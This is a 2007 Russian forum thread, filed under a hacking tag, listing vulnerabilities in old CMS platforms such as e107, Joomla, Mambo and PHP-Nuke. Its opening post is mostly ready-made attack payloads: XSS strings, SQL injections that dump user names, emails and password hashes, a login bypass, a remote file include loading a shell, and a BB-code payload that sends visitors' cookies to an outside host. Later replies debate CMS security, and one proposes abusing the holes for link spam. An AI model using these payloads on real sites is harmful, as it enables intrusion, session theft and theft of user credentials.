[Взлом] Уязвимости в некоторых CMS

Тема в разделе "Статьи и Co", создана пользователем lordstn, 8 июл 2007.

Статус темы:
Закрыта.
  1. lordstn

    lordstn Постоялец

    Регистр.:
    21 фев 2007
    Сообщения:
    76
    Симпатии:
    11
    e107
    V. 0.7.5 XSS xttp://site.com/search.php?q=&r=0&s=Search&in=1&ex=1&ep= %27%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript % 3E&be=1&t=1&adv=1&type=all&on=new&time=any&author=

    XSS при обработке BB

    PHP:
    [color=#EFEFEF][url]www.ut[url= http://www.s=''style='font-size:0;color:# EFEFEF'style='top:expression(eval(this.sss)); 'sss=`i=new/**/Image(); i.src='http://www. milw0rm.com/cgi-bin/shell.jpg?'+document. cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
    V. 0.615
    SQL INJ xttp://site.com/content.php?content.99/* */UNION/**/SELECT/**/null,null,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user _password),null,null,null,null,null,null, null,null,null/**/FROM/**/e107_user/**/ WHERE/**/user_id=1/*

    xttp://site.com/content.php?query=content_id=99%20UNION%20select%2 0null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user _password), null,null,null,null,null, null,null,null,null,null,null%20FROM%20e107_user%2 0WHERE%20user_id=1/*
    xttp://site.com/news.php?list.99/**/UNION/**/SELECT/**/nul l,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user _password),null,null,null,null,null, null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

    XSS xttp://site.com/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    xttp://localhost/e107_0615/usersettings.php?avmsg=[xss code here]

    PHP include xttp://site.com/e107_handlers/secure_img_render.php?p=http://site.com/shell.php
    Joomla
    V. 1.0.9
    XSS xttp://site.com/search.php?q=&r=0&s=Search&in=1&ex=1&ep= %27%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript % 3E&be=1&t=1&adv=1&type=all&on=new&time=any&author=
    Slaed CMS
    V. 2 Lite
    XSS в модуле Submit News <img src='javascript:alert(/1/)'
    Data Life Engine
    V. 1.3a5
    SQL INJ xttp://[host]/index.php?subaction=userinfo&user=[SQl code]
    Mambo
    V. 4.5.3h
    SQL INJ xttp://site.com/index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypassword&option=login&Submit=Login&op2=login
    〈=english&return=${file}&message=0
    RUNCMS
    V. 1.3a5
    XSS xttp://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]
    sPaiz-Nuke
    V. 1.0.9
    XSS xttp://site.com/modules.php?name=Articles&file=search&query=[XSS code]&type=articles&type=comments
    lucidCMS
    1.0.11

    SQL INJ index.php?command=panel
    Dragonfly CMS
    9.0.6.1

    XSS /index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat =0&news_search_comments=0&coppermine=
    Nodez
    V. 4.6.1.1

    XSS xttp://site.com/index.php?node=system&op=block%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E&block=3&bop=more
    XOOPS
    V. 2.0.11

    SQL INJ xttp://site.comxmlrpc.php POST <?xml version="1.0"?><methodCall><methodName>blogger.get UsersBlogs</methodName><params><param><value><string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall></font>
    SiteEnable
    V. 3.3

    XSS xttp://site.com/login.asp?ret_page=a%22%3E%3Cscript%3Ealert('t')%3 C/script%3E%3C%22
    PortalApp
    3.3

    XSS xttp://site.com/login.asp?ret_page=a%22%3E%3Cscript%3Ealert('XSS') %3C/script%3E%3C%22
    PHP-Nuke
    V. 6.0

    XSS в поиске ><script>alert(document.cookie);</script>
    V. 7.8
    XSS xttp://site.com/?pagetitle=title
    V. 7.8
    SQL xttp://[target]/[path]/modules.php?name=Downloads &d_op=Add&url=[SQL]&title=what&description=what


    xttp://[target]/[path]/modules.php?name=Web_Links & l_op=Add&title=what&description=[SQL]&url=what/font>
    V. 6.x, 7-7.6
    XSS xttp://[target]/[nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS code]&query=[our query]

    xttp://[target]/[nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS code]&query= [our_query]&type=users&category=2

    xttp://[target]/[nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS code]&query= [our_query]&type=comments&categ ory=2

    V. 6.x, 7.2, 7.3
    XSS xttp://site.com/modules.php?name=Reviews&rop=postcomment&id='<h1>XSS</h1&title =a

    xttp://site.com/modules.php?name=Reviews&rop=postcomment&id='&title=<h1>XSS</h1>/font>
     
    КОБ в Украине, Юрец, yasa и ещё 1-му нравится это.
  2. Reset

    Reset Создатель

    Регистр.:
    30 июн 2007
    Сообщения:
    48
    Симпатии:
    13
    Интересная инфа, продолжай в том-же духе... вот только пожалуй под HIDE её все-же надо было-бы закинуть... :D

    а эта инфа весьма поможет убедить глупых заказчиков отказаться от сих нехороших CMS.... естественно в пользу выбраной мастером...
     
  3. (=SPRUT=)

    (=SPRUT=) Постоялец

    Регистр.:
    20 авг 2007
    Сообщения:
    70
    Симпатии:
    65
    Не ну а в новых CMS ошибки исправляються но 100% надёжности никто не даейт. По поводу nuke разочаровался :)
     
  4. omni

    omni Постоялец

    Регистр.:
    13 июн 2007
    Сообщения:
    99
    Симпатии:
    15
    а какие цмс в этом смысле лучше, надежнее, кто знает?
     
  5. Reset

    Reset Создатель

    Регистр.:
    30 июн 2007
    Сообщения:
    48
    Симпатии:
    13
    Лучше всего своя самописная... где ты один знаешь её нутро и больше никто... :D да и то 100% гарантии нет. во всем остальном любую CMS можно сломать при желании... :D
     
  6. garcia

    garcia Прохожие

    Пофиксено давно - юзайте 1.0.12 или 1.0.13 - по сравнению с 1.0.9 приняты координальные меры по усилению секьюрности - напр. полный аудит всех запросов к БД на предмет инъекций (с 1.0.12)

    Добавлено через 15 минут
    search.php - в корне джумлы такого нету. Есть тока компонент поиска в components/com_search, но его не запустишь самостоятельно.
    Но было дело с XSS конечно
    http://secunia.com/search/?search=joomla
     
  7. yasa

    yasa Писатель

    Регистр.:
    1 май 2006
    Сообщения:
    9
    Симпатии:
    0
    Не факт, что самописная CMS-ка может оказаться лучше тех, над которыми работают несколько десятков опытных программеров. Недаром интерес к этим ^^^ CMS у взломщиков...
    omni, если опытный программер сделает нормальный движок или CMS-ку, то обычно такие CMS-ки только платные и ставятся исключительно для конкретных клиентов и редко продаются по инету...
     
  8. AboveZero

    AboveZero Создатель

    Регистр.:
    7 апр 2006
    Сообщения:
    16
    Симпатии:
    0
    В Cms системах дык как в сите, при умелом подходе даже новичка есть шанс хорошей доработки...
    Просто ставим чекеры скриптов и использую свой мозг и прямые руки доводим до ума.
     
  9. yasa

    yasa Писатель

    Регистр.:
    1 май 2006
    Сообщения:
    9
    Симпатии:
    0
    Потом такие "умело настроенные" CMS-ки ломаются такими же новичками... Довести до ума конечно можно любую CMS, но все-таки дилетантам в таком деле (если планируется крупный ресурс) лучше не доверять, так как даже опытные настрйощики и разработчики очень часто допускают ошибки... А любая ошибка на хорошем ресурсе равнозначна полному краху системы... :-]
     
  10. valeravl

    valeravl Постоялец

    Регистр.:
    14 июн 2007
    Сообщения:
    121
    Симпатии:
    23
    ухх ты так тут некоторые вещи можно как бонусные хосты использовать, в смысле для раскрутки
     
Статус темы:
Закрыта.